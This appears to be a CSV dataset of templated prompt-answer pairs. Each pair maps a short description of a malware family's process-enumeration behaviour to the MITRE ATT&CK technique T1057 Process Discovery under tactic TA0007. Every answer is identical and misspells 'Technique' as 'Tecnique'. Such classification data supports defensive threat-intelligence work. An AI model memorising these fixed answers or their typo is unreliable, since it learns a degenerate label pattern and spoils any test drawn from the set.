+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DRATzarus can enumerate and examine running processes to determine if a debugger is present.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dacls can collect data on running and parent processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet can list active processes running on the victim’s machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate performs various checks for running processes, including security software by looking for hard-coded process name values.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can enumerate a list of running processes on a compromised system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Derusbi collects current and parent process IDs.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol has used `CreateToolhelp32Snapshot`, `Process32First`, and `Process32Next` API calls to enumerate the running processes in the system.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Doki has searched for the current process’s PID.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Donut includes subprojects that enumerate and identify information about Process Injection candidates.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack’s dropper can list all running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The discovery modules used with Duqu can collect information on process details.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DustySky collects information about running processes from victims.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EKANS looks for processes from a hard-coded list.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ELMER is capable of performing process listings.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elise enumerates processes via the tasklist command.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has been observed enumerating local processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can find information about processes running on local and remote systems.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic uses the tasklist /v command to obtain a list of processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilBunny has used EnumProcesses() to identify how many process are running in the environment.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT collects a list of running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke can list running processes on the localhost.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher checks its parent process for indications that it is running in a sandbox setup.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Final1stspy obtains a list of running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro has been used to run the tasklist command on a compromised system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb's loader can enumerate all Common Language Runtimes (CLRs) and running Application Domains in the compromised AD FS server's Microsoft.IdentityServer.ServiceHost.exe process.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FrameworkPOS can enumerate and exclude selected processes on a compromised host to speed execution of memory scraping.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FruitFly has the ability to list processes on the system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream has the ability to discover processes, including `Bka.exe` and `BkavUtil.exe`.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fysbis can collect information about running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can enumerate running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GeminiDuke collects information on running processes and environment variables from the victim.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Get2 has the ability to identify running processes on an infected host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gold Dragon checks the running processes on the victim’s machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy has checked for the Google Updater process to ensure Goopy was loaded properly.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can identify installed security tools based on process names.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT lists the running processes on the system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HALFBAKED can obtain information about running processes on the victim.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HELLOKITTY can search for specific processes to terminate.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Helminth has used Tasklist to get information on processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Heyoka Backdoor can gather process information.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant has the ability to list running processes on the infected host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq creates a backdoor through which remote attackers can monitor processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Imminent Monitor has a ""Process Watcher"" feature to monitor processes in case the client ever crashes or gets closed.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer2 has the ability to cyclically enumerate running processes such as PServiceControl.exe, PService_PDD.exe, and other targets supplied through a hardcoded configuration.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can obtain a list of running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IronNetInjector can identify processes via C# methods such as GetProcessesByName and running Tasklist with the Python os.popen function.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ixeshe can list running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JHUHUGIT obtains a list of running processes on the victim.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN can list running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Javali can monitor processes for open browsers and custom banking applications.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KEYMARBLE can obtain a list of running processes on the system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has used the command cmd /c tasklist to get a snapshot of the current processes on the target machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOPILUWAK can enumerate current running processes on the targeted machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kasidet has the ability to search for a given process name in processes currently running in the system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar obtains a list of running processes through WMI querying and the ps command.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KillDisk has called GetCurrentProcess.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kinsing has used ps to list processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The OsInfo function in Komplex collects a running process list.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs collects a list of running services with the command tasklist /v.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Linfo creates a backdoor through which remote attackers can retrieve a list of running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar has a plugin designed to obtain a list of processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LookBack can list running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner used the ps command to monitor the running processes on the system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can identify the process that owns remote connections.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa can enumerate running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has a component to check for running processes to look for web browsers.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can enumerate running processes on a machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can search for different processes on a system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has gathered all of the running system processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has performed process name checks and has monitored applications.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor can check if a specific process is running, such as Kaspersky's `avp.exe`.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu can enumerate the running processes on a compromised host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MobileOrder has a command to upload information about all running processes to its C2 server.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoonWind has a command to return a list of running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mosquito runs tasklist to obtain running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETEAGLE can send process listings over the C2 channel.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can discover processes on compromised hosts.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NKAbuse will check victim systems to ensure only one copy of the malware is running.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NavRAT uses tasklist /v to check running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nebulae can enumerate processes on a target system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub has the ability to use `GetWindowThreadProcessId` to identify the process behind a specified window.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja can enumerate processes on a targeted host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ObliqueRAT can check for blocklisted process names on a compromised host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OceanSalt can collect the name and ID for every process running on the system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Orz can gather a process list from the victim.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OutSteel can identify running processes on a compromised host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P8RAT can check for specific processes associated with virtual environments.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLAINTEE performs the tasklist command to list running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLEAD has the ability to list processes on the compromised host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POORAIM can enumerate processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS has used get_tasklist to discover processes on the compromised host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER may collect process information by running tasklist on a victim.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pandora can monitor processes on a compromised host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pasam creates a backdoor through which remote attackers can retrieve lists of running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare can obtain a list of running processes on a compromised host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pillowmint can iterate through running processes every six seconds collecting a list of processes to capture from later.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon can iterate over the running processes to find a suitable injection target.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX has a module to list the processes running on a machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has the ability to list all running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerDuke has a command to list the victim's processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerShower has the ability to deploy a reconnaissance module to retrieve a list of the active processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit's Get-ProcessTokenPrivilege Privesc-PowerUp module can enumerate privileges for a given process.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerStallion has been used to monitor process lists.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proxysvc lists processes running on the system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can list the running processes and get the process ID and parent process’s ID.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has the ability to check running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RATANKBA lists the system’s processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession can identify processes based on PID.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can list the current running processes on the system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can obtain information about process integrity levels.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can enumerate processes on a target system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can gather a list of running processes by using Tasklist.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec can obtain a process list from the victim.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun can enumerate all running processes and process information on an infected machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RogueRobin checks the running processes for evidence it may be running in a sandbox environment. It specifically enumerates processes for Wireshark and Sysinternals.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RotaJakiro can monitor the `/proc/[PID]` directory of known RotaJakiro processes as a part of its persistence when executing with non-root permissions. If the process is found dead, it resurrects the process. RotaJakiro processes can be matched to an associated Advisory Lock, in the `/proc/locks` folder, to ensure it doesn't spawn more than one process.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Royal can use `GetCurrentProcess` to enumerate processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk has called CreateToolhelp32Snapshot to enumerate all running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot can enumerate a list of running processes on a compromised machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHOTPUT has a command to obtain a process listing.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can enumerate processes, including properties to determine if they have the Common Language Runtime (CLR) loaded.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has enumerated processes by ID, name, or privileges.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST collected a list of process names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNSPOT monitored running processes for instances of MsBuild.exe by hashing the name of each running process and comparing it to the corresponding value 0x53D525. It also extracted command-line arguments and individual arguments from the running MsBuild.exe process to identify the directory path of the Orion software Visual Studio solution.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady can collect a list of running processes from an infected host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SYSCON has the ability to use Tasklist to list running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has enumerated running processes on a compromised host to determine if it is running under the process name `dfrgui.exe`.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic has the ability to execute the `tasklist` command.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Seasalt has a command to perform a process listing.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad has collected the PID of a malicious process.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRatReporter listed all running processes on the machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Skidmap has monitored critical processes to ensure resiliency.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SocGholish can list processes on targeted hosts.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Socksbot can list all running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SodaMaster can search a list of running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT can use the getprocesslist command to enumerate processes on a compromised host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SoreFang can enumerate processes on a victim machine through use of Tasklist.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StreamEx has the ability to enumerate processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity can determine if a user is logged in by checking to see if explorer.exe is running.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sykipot may gather a list of running processes by running tasklist /v.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SynAck enumerates all running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can collect information about running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TAINTEDSCRIBE can execute ProcessList for process discovery.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TSCookie has the ability to list processes on the infected host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor can use GetCurrentProcessId for process discovery.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to identify running processes and associated plugins on an infected host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tasklist can be used to discover processes running on a system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThiefQuest obtains a list of running processes using the function kill_unwanted.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot uses module networkDll for process list discovery.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can use Tasklist to collect a list of running tasks.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UBoatRAT can list running processes on the system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBferry can use tasklist to gather information about the process running on the infected system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can use its `Process List` command to enumerate processes on compromised hosts.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has gathered information about running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VERMIN can get a list of the processes and running tasks on the system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has the ability to enumerate running processes on a compromised host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volgmer can gather a list of processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WINERACK can enumerate processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can obtain a list of processes on a compromised host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Waterbear can identify the process for a specific security product.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WinMM sets a WH_CBT Windows hook to collect information on process creation.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Windows can check if the explorer.exe process is responsible for calling its install function.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can call `NtQuerySystemProcessInformation` with `SystemProcessInformation` to enumerate all running processes, including associated information such as PID, parent PID, image name, and owner.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XAgentOSX contains the getProcessList function to run ps aux to get running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
